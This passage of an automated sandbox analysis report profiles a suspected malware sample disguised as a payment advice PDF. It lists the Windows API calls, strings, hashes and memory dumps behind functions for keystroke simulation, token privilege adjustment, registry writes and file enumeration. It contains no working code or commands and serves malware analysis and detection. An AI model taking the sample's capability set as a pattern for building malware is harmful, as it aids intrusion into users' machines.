                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: c8787378cc9b0549549dc8e2e1f9abc997af8c45933c2d94c1386071a72fd762
                                                              • Instruction ID: d73788066a162cfb9538c7dfb1a5f515066551741da33d9af3edf35ac9c61b39
                                                              • Opcode Fuzzy Hash: c8787378cc9b0549549dc8e2e1f9abc997af8c45933c2d94c1386071a72fd762
                                                              • Instruction Fuzzy Hash: 4B0162764413549FD7138F78A8019F57BF9FF86620B0605FAE844CB961D6305D158BE1
                                                              Function 00864863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 008648A6
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: 9cbc0b66394bfe5e78ed1a57df11b1f53a533c7255d5deb4ef34f6dc2b92676d
                                                              • Instruction ID: 354de08a4ec13c0233bd2d1bc0d6057cab072fb96376e343bb359c613252baaf
                                                              • Opcode Fuzzy Hash: 9cbc0b66394bfe5e78ed1a57df11b1f53a533c7255d5deb4ef34f6dc2b92676d
                                                              • Instruction Fuzzy Hash: A9F0AF71900649EBDF11AFBC8C067AE36A1FF00325F179524F428DB191DBB88951DF52
                                                              Function 00844E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 6da3c3cf1729c14103cde8af6b5a9ce82bcf9027d802b002003a8cae5af97adb
                                                              • Instruction ID: c111075034bbb36c4c05f2f70c8beff13139d1f0b10468da98c2a9f829274640
                                                              • Opcode Fuzzy Hash: 6da3c3cf1729c14103cde8af6b5a9ce82bcf9027d802b002003a8cae5af97adb
                                                              • Instruction Fuzzy Hash: 67F01571501719CFDB349F68E894912BBE1FF143393249A3EE2D6C2620C732A840DB40
                                                              Function 00860791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008607B0
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_memmove
                                                              • String ID:
                                                              • API String ID: 2514874351-0
                                                              • Opcode ID: 218fd4e0faecc2a8b2cb8ce757f8cb041d5c7bfee9db287eabd550d98d70a110
                                                              • Instruction ID: 3e2d5605f7b2cd0be7cccf812d40a554756242c8366c68f160058bb9468a4e2c
                                                              • Opcode Fuzzy Hash: 218fd4e0faecc2a8b2cb8ce757f8cb041d5c7bfee9db287eabd550d98d70a110
                                                              • Instruction Fuzzy Hash: 1DE0CD369041285BC721D65C9C05FEA77EDEF887A0F0441B5FD0CD7209DA709C8086D1
                                                              Function 0086525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __wfsopen
                                                              • String ID:
                                                              • API String ID: 197181222-0
                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction ID: 26d35b798997bd9cc99275f1a03e4c5531cbbce0bd8cbbf11a193ca2a5c12403
                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                              • Instruction Fuzzy Hash: AEB0927644020C77CE012A86EC02A493B1AAB41B64F408020FB0C18262A673A6649A8A
                                                              Function 01655200 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 01655211
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: a37ff7bb5a17f940a91c1ab779626953d79d750fd3f74c9f4a2350ed4ace08e9
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: DAE0E67494010DEFDB00EFB4D94D69E7FB4EF04301F104161FD05E2281D6309D508A62

                                                              Non-executed Functions

                                                              Function 008CCABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 008CCB37
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008CCB95
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CCBD6
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008CCC00
                                                              • SendMessageW.USER32 ref: 008CCC29
                                                              • _wcsncpy.LIBCMT ref: 008CCC95
                                                              • GetKeyState.USER32(00000011), ref: 008CCCB6
                                                              • GetKeyState.USER32(00000009), ref: 008CCCC3
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008CCCD9
                                                              • GetKeyState.USER32(00000010), ref: 008CCCE3
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008CCD0C
                                                              • SendMessageW.USER32 ref: 008CCD33
                                                              • SendMessageW.USER32(?,00001030,?,008CB348), ref: 008CCE37
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 008CCE4D
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008CCE60
                                                              • SetCapture.USER32(?), ref: 008CCE69
                                                              • ClientToScreen.USER32(?,?), ref: 008CCECE
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008CCEDB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008CCEF5
                                                              • ReleaseCapture.USER32 ref: 008CCF00
                                                              • GetCursorPos.USER32(?), ref: 008CCF3A
                                                              • ScreenToClient.USER32(?,?), ref: 008CCF47
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 008CCFA3
                                                              • SendMessageW.USER32 ref: 008CCFD1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 008CD00E
                                                              • SendMessageW.USER32 ref: 008CD03D
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008CD05E
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 008CD06D
                                                              • GetCursorPos.USER32(?), ref: 008CD08D
                                                              • ScreenToClient.USER32(?,?), ref: 008CD09A
                                                              • GetParent.USER32(?), ref: 008CD0BA
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 008CD123
                                                              • SendMessageW.USER32 ref: 008CD154
                                                              • ClientToScreen.USER32(?,?), ref: 008CD1B2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008CD1E2
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 008CD20C
                                                              • SendMessageW.USER32 ref: 008CD22F
                                                              • ClientToScreen.USER32(?,?), ref: 008CD281
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008CD2B5
                                                                • Part of subcall function 008425DB: GetWindowLongW.USER32(?,000000EB), ref: 008425EC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008CD351
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 3977979337-4164748364
                                                              • Opcode ID: be274c1a33b4958842ed1cd6210274c2cf850dff7af831819cb4663140461478
                                                              • Instruction ID: a1bde3fd3313fc9984a8bda12eb4c29dc8a6c287476b4098c96f251321339f47
                                                              • Opcode Fuzzy Hash: be274c1a33b4958842ed1cd6210274c2cf850dff7af831819cb4663140461478
                                                              • Instruction Fuzzy Hash: 88426774208641AFDB249F68C849FAABBF5FF49320F14452DFA99C72A1D731D840DB52
                                                              Function 00856F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _memmove$_memset
                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                              • API String ID: 1357608183-1798697756
                                                              • Opcode ID: 2b0f46f4229420284ea161b7e5f416254ef647adb7ad48a620848f488753cff8
                                                              • Instruction ID: 022afbcdb5159ae40d922725734860aa8fe9881a3a2b5a55d7e7549dd6344295
                                                              • Opcode Fuzzy Hash: 2b0f46f4229420284ea161b7e5f416254ef647adb7ad48a620848f488753cff8
                                                              • Instruction Fuzzy Hash: 2A93AF75A04219DFDF24DF98D881BADB7B1FF48314F29816AE945EB281E7709E81CB40
                                                              Function 008448D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,?), ref: 008448DF
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0087D665
                                                              • IsIconic.USER32(?), ref: 0087D66E
                                                              • ShowWindow.USER32(?,00000009), ref: 0087D67B
                                                              • SetForegroundWindow.USER32(?), ref: 0087D685
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0087D69B
                                                              • GetCurrentThreadId.KERNEL32 ref: 0087D6A2
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0087D6AE
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087D6BF
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0087D6C7
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 0087D6CF
                                                              • SetForegroundWindow.USER32(?), ref: 0087D6D2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D6E7
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D6F2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D6FC
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D701
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D70A
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D70F
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0087D719
                                                              • keybd_event.USER32(00000012,00000000), ref: 0087D71E
                                                              • SetForegroundWindow.USER32(?), ref: 0087D721
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 0087D748
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: 1b2ac5ae4b7d9b5b9d126248f5997ba50ed29492233d3877b240dd95e904712a
                                                              • Instruction ID: fdfad92489920555db978db7de6151013c64352e838dfbb2a8e2af12f8b386e1
                                                              • Opcode Fuzzy Hash: 1b2ac5ae4b7d9b5b9d126248f5997ba50ed29492233d3877b240dd95e904712a
                                                              • Instruction Fuzzy Hash: 1F315571A40318BBFB215B619C49F7F7E7DFF44B50F108025FB09EA1D1D6B09911AAA1
                                                              Function 00898310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0089882B
                                                                • Part of subcall function 008987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00898858
                                                                • Part of subcall function 008987E1: GetLastError.KERNEL32 ref: 00898865
                                                              • _memset.LIBCMT ref: 00898353
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008983A5
                                                              • CloseHandle.KERNEL32(?), ref: 008983B6
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008983CD
                                                              • GetProcessWindowStation.USER32 ref: 008983E6
                                                              • SetProcessWindowStation.USER32(00000000), ref: 008983F0
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0089840A
                                                                • Part of subcall function 008981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00898309), ref: 008981E0
                                                                • Part of subcall function 008981CB: CloseHandle.KERNEL32(?,?,00898309), ref: 008981F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $default$winsta0
                                                              • API String ID: 2063423040-1027155976
                                                              • Opcode ID: 71223cfc49e8dda98fe0c17a3f7e66aa9472878586bc2b9e664ff25d6b89e326
                                                              • Instruction ID: 368bed53f275e1f950d3097c867a0135313d6e20d859a92a19f8dbce5e6c0ce4
                                                              • Opcode Fuzzy Hash: 71223cfc49e8dda98fe0c17a3f7e66aa9472878586bc2b9e664ff25d6b89e326
                                                              • Instruction Fuzzy Hash: E781277190024AEFEF11AFA4DC45EEEBBB9FF05304F184169F914E6261DB318A19DB21
                                                              Function 008AC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 008AC78D
                                                              • FindClose.KERNEL32(00000000), ref: 008AC7E1
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008AC806
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008AC81D
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 008AC844
                                                              • __swprintf.LIBCMT ref: 008AC890
                                                              • __swprintf.LIBCMT ref: 008AC8D3
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • __swprintf.LIBCMT ref: 008AC927
                                                                • Part of subcall function 00863698: __woutput_l.LIBCMT ref: 008636F1
                                                              • __swprintf.LIBCMT ref: 008AC975
                                                                • Part of subcall function 00863698: __flsbuf.LIBCMT ref: 00863713
                                                                • Part of subcall function 00863698: __flsbuf.LIBCMT ref: 0086372B
                                                              • __swprintf.LIBCMT ref: 008AC9C4
                                                              • __swprintf.LIBCMT ref: 008ACA13
                                                              • __swprintf.LIBCMT ref: 008ACA62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3953360268-2428617273
                                                              • Opcode ID: 202c127e2887a35f327d55106375989692c8e15a9424a80c95a40eefe6266359
                                                              • Instruction ID: 6ba3df5cdca47c601f0cf13f8c5fc9838756ea9d5a7fb0d13a1490feb8528a87
                                                              • Opcode Fuzzy Hash: 202c127e2887a35f327d55106375989692c8e15a9424a80c95a40eefe6266359
                                                              • Instruction Fuzzy Hash: AEA11EB1408209ABD750EFA8C885DAFB7ECFF95704F404929F595C6192EB34DA08CB63
                                                              Function 008AEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 008AEFB6
                                                              • _wcscmp.LIBCMT ref: 008AEFCB
                                                              • _wcscmp.LIBCMT ref: 008AEFE2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 008AEFF4
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 008AF00E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 008AF026
                                                              • FindClose.KERNEL32(00000000), ref: 008AF031
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008AF04D
                                                              • _wcscmp.LIBCMT ref: 008AF074
                                                              • _wcscmp.LIBCMT ref: 008AF08B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008AF09D
                                                              • SetCurrentDirectoryW.KERNEL32(008F8920), ref: 008AF0BB
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008AF0C5
                                                              • FindClose.KERNEL32(00000000), ref: 008AF0D2
                                                              • FindClose.KERNEL32(00000000), ref: 008AF0E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 5579b8e4747d5001b6bd8b7cd040d8380a7d0eeac138c8f2aa995733ae19f7c9
                                                              • Instruction ID: 7c611256b8e39afa92fd15eddb4af9e3234f126238d8ce900163006c6eaba008
                                                              • Opcode Fuzzy Hash: 5579b8e4747d5001b6bd8b7cd040d8380a7d0eeac138c8f2aa995733ae19f7c9
                                                              • Instruction Fuzzy Hash: 3C31D232600608ABEB149BB4EC48EEEB7ADFF4A360F104175EA10D3193DB74DA44CE61
                                                              Function 008C0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008C0953
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,008CF910,00000000,?,00000000,?,?), ref: 008C09C1
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008C0A09
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008C0A92
                                                              • RegCloseKey.ADVAPI32(?), ref: 008C0DB2
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 008C0DBF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: d2807d0fd589cc39974fc470cfafa3b3782bf80e04569b0c1ab801cbc3a9f213
                                                              • Instruction ID: 40589f9ddc171e4e71af25b71a20d33e26f18311f37884b8cc46a4e2382bbe14
                                                              • Opcode Fuzzy Hash: d2807d0fd589cc39974fc470cfafa3b3782bf80e04569b0c1ab801cbc3a9f213
                                                              • Instruction Fuzzy Hash: 820246756006159FCB24EF28C841E2AB7E5FF89714F04856DF99ADB262CB31EC45CB82
                                                              Function 008AF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 008AF113
                                                              • _wcscmp.LIBCMT ref: 008AF128
                                                              • _wcscmp.LIBCMT ref: 008AF13F
                                                                • Part of subcall function 008A4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008A43A0
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 008AF16E
                                                              • FindClose.KERNEL32(00000000), ref: 008AF179
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008AF195
                                                              • _wcscmp.LIBCMT ref: 008AF1BC
